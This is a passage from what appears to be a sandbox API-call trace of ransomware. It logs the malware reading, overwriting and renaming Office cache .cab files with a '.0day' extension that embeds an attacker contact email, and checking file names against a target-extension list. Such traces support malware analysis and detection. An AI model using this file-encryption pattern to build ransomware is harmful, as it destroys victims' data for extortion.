lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.196] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x326fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0041.196] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x28b13b, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0041.196] ReadFile (in: hFile=0x188, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.221] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.222] WriteFile (in: hFile=0x188, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x326fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0041.241] SetEndOfFile (hFile=0x188) returned 1 [0041.241] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3ed2068 [0041.511] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0041.511] WriteFile (in: hFile=0x188, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.512] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xee5be, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0041.512] WriteFile (in: hFile=0x188, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.517] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x28b13b, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0041.517] WriteFile (in: hFile=0x188, lpBuffer=0x3ed2068*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed2068*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.519] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed2068 | out: hHeap=0x5f0000) returned 1 [0041.522] CloseHandle (hObject=0x188) returned 1 [0041.963] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0041.963] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0041.963] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0041.963] lstrlenW (lpString=".doc") returned 4 [0041.963] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0041.963] lstrlenW (lpString=".docx") returned 5 [0041.963] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0041.963] lstrlenW (lpString=".pdf") returned 4 [0041.963] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0041.963] lstrlenW (lpString=".xls") returned 4 [0041.963] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0041.963] lstrlenW (lpString=".xlsx") returned 5 [0041.963] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0041.963] lstrlenW (lpString=".ppt") returned 4 [0041.963] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0041.963] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0041.963] lstrlenW (lpString=".zip") returned 4 [0041.963] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0041.964] lstrlenW (lpString=".rar") returned 4 [0041.964] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0041.964] lstrlenW (lpString=".bz2") returned 4 [0041.964] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0041.964] lstrlenW (lpString=".7z") returned 3 [0041.964] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0041.964] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0041.964] lstrlenW (lpString=".dbf") returned 4 [0041.964] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0041.964] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0041.964] lstrlenW (lpString=".1cd") returned 4 [0041.964] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0041.964] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0041.964] lstrlenW (lpString=".jpg") returned 4 [0041.964] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0041.964] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0041.964] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0041.964] lstrlenW (lpString=".doc") returned 4 [0041.964] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0041.964] lstrlenW (lpString=".docx") returned 5 [0041.964] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0041.964] lstrlenW (lpString=".pdf") returned 4 [0041.964] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0041.964] lstrlenW (lpString=".xls") returned 4 [0041.964] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0041.964] lstrlenW (lpString=".xlsx") returned 5 [0041.964] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0041.964] lstrlenW (lpString=".ppt") returned 4 [0041.964] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0041.964] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0041.964] lstrlenW (lpString=".zip") returned 4 [0041.964] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0041.964] lstrlenW (lpString=".rar") returned 4 [0041.965] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0041.965] lstrlenW (lpString=".bz2") returned 4 [0041.965] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0041.965] lstrlenW (lpString=".7z") returned 3 [0041.965] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0041.965] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0041.965] lstrlenW (lpString=".dbf") returned 4 [0041.965] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0041.965] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0041.965] lstrlenW (lpString=".1cd") returned 4 [0041.965] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0041.965] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75 [0041.965] lstrlenW (lpString=".jpg") returned 4 [0041.965] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0041.965] lstrcmpiW (lpString1=".cab", lpString2=".0day") returned 1 [0041.965] lstrlenW (lpString="VisioLR.cab") returned 11 [0041.965] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0041.966] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=50823389) returned 1 [0041.966] CloseHandle (hObject=0x188) returned 1 [0041.966] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab")) returned 0x2020 [0041.966] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0041.966] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0041.966] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0041.966] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc6c | out: lpNewFilePointer=0x0) returned 1 [0041.966] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0041.966] ReadFile (in: hFile=0x188, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.202] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x1028049, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.202] ReadFile (in: hFile=0x188, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.205] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x326fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0042.206] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x30380dd, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.206] ReadFile (in: hFile=0x188, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.222] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.222] WriteFile (in: hFile=0x188, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x326fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0042.238] SetEndOfFile (hFile=0x188) returned 1 [0042.238] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3fca0b8 [0042.238] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.238] WriteFile (in: hFile=0x188, lpBuffer=0x3fca0b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fca0b8*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.239] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x1028049, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.239] WriteFile (in: hFile=0x188, lpBuffer=0x3fca0b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fca0b8*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.240] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x30380dd, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.240] WriteFile (in: hFile=0x188, lpBuffer=0x3fca0b8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fca0b8*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.242] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3fca0b8 | out: hHeap=0x5f0000) returned 1 [0042.242] CloseHandle (hObject=0x188) returned 1 [0042.242] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0042.242] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0042.242] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0042.242] lstrlenW (lpString=".doc") returned 4 [0042.242] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0042.242] lstrlenW (lpString=".docx") returned 5 [0042.242] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0042.242] lstrlenW (lpString=".pdf") returned 4 [0042.242] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0042.242] lstrlenW (lpString=".xls") returned 4 [0042.243] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0042.243] lstrlenW (lpString=".xlsx") returned 5 [0042.243] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0042.243] lstrlenW (lpString=".ppt") returned 4 [0042.243] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0042.243] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0042.243] lstrlenW (lpString=".zip") returned 4 [0042.243] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0042.243] lstrlenW (lpString=".rar") returned 4 [0042.243] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0042.243] lstrlenW (lpString=".bz2") returned 4 [0042.243] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0042.243] lstrlenW (lpString=".7z") returned 3 [0042.471] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0042.471] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0042.471] lstrlenW (lpString=".dbf") returned 4 [0042.471] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0042.471] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0042.471] lstrlenW (lpString=".1cd") returned 4 [0042.471] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0042.471] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0042.471] lstrlenW (lpString=".jpg") returned 4 [0042.471] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0042.471] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0042.471] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0042.471] lstrlenW (lpString=".doc") returned 4 [0042.471] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0042.471] lstrlenW (lpString=".docx") returned 5 [0042.471] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0042.471] lstrlenW (lpString=".pdf") returned 4 [0042.471] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0042.471] lstrlenW (lpString=".xls") returned 4 [0042.471] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0042.471] lstrlenW (lpString=".xlsx") returned 5 [0042.471] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0042.472] lstrlenW (lpString=".ppt") returned 4 [0042.472] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0042.472] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0042.472] lstrlenW (lpString=".zip") returned 4 [0042.472] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0042.472] lstrlenW (lpString=".rar") returned 4 [0042.472] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0042.472] lstrlenW (lpString=".bz2") returned 4 [0042.472] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0042.472] lstrlenW (lpString=".7z") returned 3 [0042.472] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0042.472] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0042.472] lstrlenW (lpString=".dbf") returned 4 [0042.472] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0042.472] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0042.472] lstrlenW (lpString=".1cd") returned 4 [0042.472] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0042.472] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0042.472] lstrlenW (lpString=".jpg") returned 4 [0042.472] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0042.472] lstrcmpiW (lpString1=".cab", lpString2=".0day") returned 1 [0042.472] lstrlenW (lpString="OnoteLR.cab") returned 11 [0042.472] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0042.473] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=17456632) returned 1 [0042.473] CloseHandle (hObject=0x208) returned 1 [0042.473] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab")) returned 0x2020 [0042.473] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0042.473] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0042.474] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0042.474] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc6c | out: lpNewFilePointer=0x0) returned 1 [0042.474] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.474] ReadFile (in: hFile=0x208, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.476] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x58c9fd, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.477] ReadFile (in: hFile=0x208, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.480] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x326fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0042.480] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x1065df8, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.480] ReadFile (in: hFile=0x208, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.494] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.494] WriteFile (in: hFile=0x208, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x326fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0042.608] SetEndOfFile (hFile=0x208) returned 1 [0042.685] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3fda0c0 [0042.686] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.686] WriteFile (in: hFile=0x208, lpBuffer=0x3fda0c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fda0c0*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.687] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x58c9fd, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.687] WriteFile (in: hFile=0x208, lpBuffer=0x3fda0c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fda0c0*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.688] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x1065df8, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.688] WriteFile (in: hFile=0x208, lpBuffer=0x3fda0c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fda0c0*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.690] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3fda0c0 | out: hHeap=0x5f0000) returned 1 [0042.690] CloseHandle (hObject=0x208) returned 1 [0042.690] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0042.690] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0042.690] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0042.690] lstrlenW (lpString=".doc") returned 4 [0042.690] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0042.690] lstrlenW (lpString=".docx") returned 5 [0042.690] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0042.690] lstrlenW (lpString=".pdf") returned 4 [0042.690] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0042.691] lstrlenW (lpString=".xls") returned 4 [0042.691] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0042.691] lstrlenW (lpString=".xlsx") returned 5 [0042.691] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0042.691] lstrlenW (lpString=".ppt") returned 4 [0042.691] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0042.691] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0042.691] lstrlenW (lpString=".zip") returned 4 [0042.691] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0042.691] lstrlenW (lpString=".rar") returned 4 [0042.691] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0042.691] lstrlenW (lpString=".bz2") returned 4 [0042.691] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0042.691] lstrlenW (lpString=".7z") returned 3 [0042.691] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0042.691] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0042.691] lstrlenW (lpString=".dbf") returned 4 [0042.691] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0042.691] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0042.691] lstrlenW (lpString=".1cd") returned 4 [0042.691] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0042.691] lstrlenW (lpString="C:\\MSOCache\\All 